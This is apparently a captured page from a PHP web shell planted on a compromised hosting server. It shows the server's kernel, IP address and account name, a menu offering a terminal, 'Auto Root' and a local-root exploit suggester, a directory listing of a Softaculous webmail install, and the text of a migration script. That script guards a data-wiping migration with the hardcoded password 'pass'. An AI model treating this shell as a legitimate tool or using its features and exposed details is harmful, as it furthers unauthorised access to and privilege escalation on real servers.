Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
webmail /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php53
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php56
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php71
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php81
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
php82
[ DIR ]
drwxr-xr-x
2025-10-24 04:26
Core.config.json
4.25
KB
-rw-r--r--
2025-01-20 04:28
_edit.php
3.58
KB
-rw-r--r--
2021-12-23 06:54
_edit.xml
433
B
-rw-r--r--
2021-12-23 06:54
_extend.php
1.51
KB
-rw-r--r--
2021-12-23 06:54
changelog.txt
2.59
KB
-rw-r--r--
2025-10-23 04:51
clone.php
4.99
KB
-rw-r--r--
2025-10-23 07:27
config.json
7.13
KB
-rw-r--r--
2025-01-20 04:28
db_init.php
619
B
-rw-r--r--
2021-12-23 06:54
encryption_key.php
8
B
-rw-r--r--
2024-09-19 06:58
fileindex.php
188
B
-rw-r--r--
2025-10-23 04:51
import.php
3.84
KB
-rw-r--r--
2025-10-23 07:27
info.xml
3.88
KB
-rw-r--r--
2025-10-23 04:51
install.js
1.29
KB
-rw-r--r--
2021-12-23 06:54
install.php
5.88
KB
-rw-r--r--
2025-10-23 07:27
install.xml
3.58
KB
-rw-r--r--
2021-12-23 06:54
md5
4.04
KB
-rw-r--r--
2025-10-23 07:27
migrate.php
1.28
KB
-rw-r--r--
2021-12-23 06:54
notes.txt
1.57
KB
-rw-r--r--
2025-07-04 07:00
upgrade.php
5.73
KB
-rw-r--r--
2025-10-23 07:27
upgrade.xml
627
B
-rw-r--r--
2024-09-19 06:58
webmail.sql
42.15
KB
-rw-r--r--
2025-10-23 04:51
webmail.zip
66.86
MB
-rw-r--r--
2025-10-23 04:51
Save
Rename
<?php use Symfony\Component\Console\Input\ArrayInput; use Symfony\Component\Console\Output\BufferedOutput; require_once "../system/autoload.php"; \Aurora\System\Api::Init(true); $sPassword = "pass"; set_time_limit(0); if (!(isset($_GET['pass']) && $sPassword !== '' && $sPassword === $_GET['pass'])) { exit("Migration script password is incorrect or not set."); } class P8ToP9Migration { public function Init() { } public function Start() { try { $container = \Aurora\Api::GetContainer(); $container['console']->setAutoExit(false); $output = new BufferedOutput(); $container['console']->find('migrate:eav-to-sql') ->run(new ArrayInput([ '--no-interaction'=>true, '--wipe'=>!!$_GET['wipe'], '--quiet'=>!!$_GET['quiet'], '--migrate-file'=>!!$_GET['migrate-file'], ]), $output); $content = array_filter(explode(PHP_EOL, $output->fetch())); dd($content); } catch (\Exception $oEx) { dd($oEx); \Aurora\System\Api::LogException($oEx); } } } ob_start(); $oMigration = new P8ToP9Migration(); $oMigration->Start(); ob_end_flush(); exit("Done");